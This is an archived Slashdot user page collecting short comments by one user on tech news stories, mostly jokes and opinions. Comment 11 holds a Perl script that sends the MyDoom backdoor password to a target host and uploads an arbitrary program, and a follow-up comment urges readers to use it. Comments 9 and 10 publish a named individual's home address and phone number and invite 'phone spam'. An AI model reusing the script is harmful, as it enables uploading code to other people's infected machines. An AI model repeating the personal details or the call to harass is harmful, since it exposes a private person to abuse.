Slashdot Mirror


User: L0stm4n

L0stm4n's activity in the archive.

Stories
0
Comments
65
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 65

  1. The artist has always been screwed on Record Labels Push for iTunes Price Hike · · Score: -1, Redundant

    The artist has been getting screwed from the get-go on this.

  2. Why on a sunday? on Artists Against 419 Takes On Scammers · · Score: 0

    Should have posted this on a monday morning to wield slashdots full might against the scammers.

  3. maybe I wont need IE anymore on New Online Ad Technology To Bypass Popup Blockers · · Score: 0

    Sometimes I open up IE on my gfs machine just to see
    how bad popups suck. Guess I wont need that anymore ;)

  4. Whip out the DMCA on New Online Ad Technology To Bypass Popup Blockers · · Score: 0, Interesting

    I wonder if I can copyright my peaceful desktop, then use the DMCA to sue these clowns for circumventing my copyright protection.

    Would be nice though wouldn't it?

  5. The pr0n of sims on Videogames as Art · · Score: -1, Offtopic

    Maybe the Sims naked patch is art ;)

    Kinda like hustler and playboy for life-deficient young boys

  6. Re:Tough Issue on Sprint Cracks Down on TTY Relay Abuses · · Score: 0

    They have plenty of money in Nigeria! Havent you read the news?

    http://www.theregister.co.uk/2004/03/31/harvard_ pr of_scams/
    http://www.kpvi.com/index.cfm?page=nbch eadlines.cf m&ID=18172
    http://www.wral.com/money/2856534/deta il.html
    http://www.coshoctontribune.com/news/stor ies/20031 206/localnews/776413.html

  7. Re:Expect "internet radio" to disappear on Shifting From P2P To Stream Ripping · · Score: 0

    wanna make a bet it wont disappear? Every online radio station I know of is barely keeping the servers up. Most are taking donations. If it has to go commercial, it'll just die.

    check out www.afterhoursdjs.org
    and www.smoothbeats.com
    and www.bassdrive.com

    these are all great stations and I know people from all of them. The riaa starts wanting any more money and we'll all be closing up shop.

  8. Re:SCO fixes on Linus Torvalds: Backporting Is A Good Thing · · Score: -1

    > echo "" > ./sco_ip.patch

    sooo...SCO has a patent on newlines (\n)?

    oh shit!

  9. Re:Heres his PHONE NUMBER!!!!!!!!! on Junkie Loves His Spam · · Score: 2, Informative

    Soto, Orlando
    325 W 43 St
    MANHATTAN, NY 10036

    212-399-0626

    He's not in at the moment though.

  10. Re:Whats his email? on Junkie Loves His Spam · · Score: -1, Offtopic

    Soto, Orlando
    325 W 43 St
    MANHATTAN, NY 10036

    212-399-0626

    Anyone care to give him some phone spam?

  11. Re:DoomNet... on New Worms Feed on MyDoom Infections · · Score: 2, Funny

    #!/usr/bin/perl -w
    use IO::Socket;
    use strict;

    if(@ARGV < 3) {
    print "****** Usage: $0 \<ip\> \<port\> \<program to upload\> ****\n";
    exit -1;
    }

    my ( $host, $port, $exe ) = ($ARGV[0], $ARGV[1], $ARGV[2]);
    my $doompass = "\x85\x13\x3c\x9e\xa2";

    my $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) or die "cannot open socket: $!";

    print $socket $doompass;

    open(INPUT, $exe) || die "Can't open: $!";
    while (<INPUT>){
    print $socket $_;
    }
    close(INPUT) || die "Can't close: $!";

  12. Re:DoomNet... on New Worms Feed on MyDoom Infections · · Score: 1

    here do it yourself. lameness filter prevents perl code

    heh...not sure if it works but if the c code does so should this.

  13. This technique is OLD!!! on "Port Knocking" For Added Security · · Score: 1

    This has been around for years

  14. Re:Too many humanoid aliens on New Battlestar Galactica Premieres Monday · · Score: 1

    Since captain Kirk spread his seed throughout the galaxy.

  15. Windpower for ranchers on The (Possible) Future of Alternative Energy · · Score: 1

    I was listening to npr and they had an article about using ranchers land to generate electricity to convert water to hydrogen. artcle here First time posting didn't research enough to get the link right.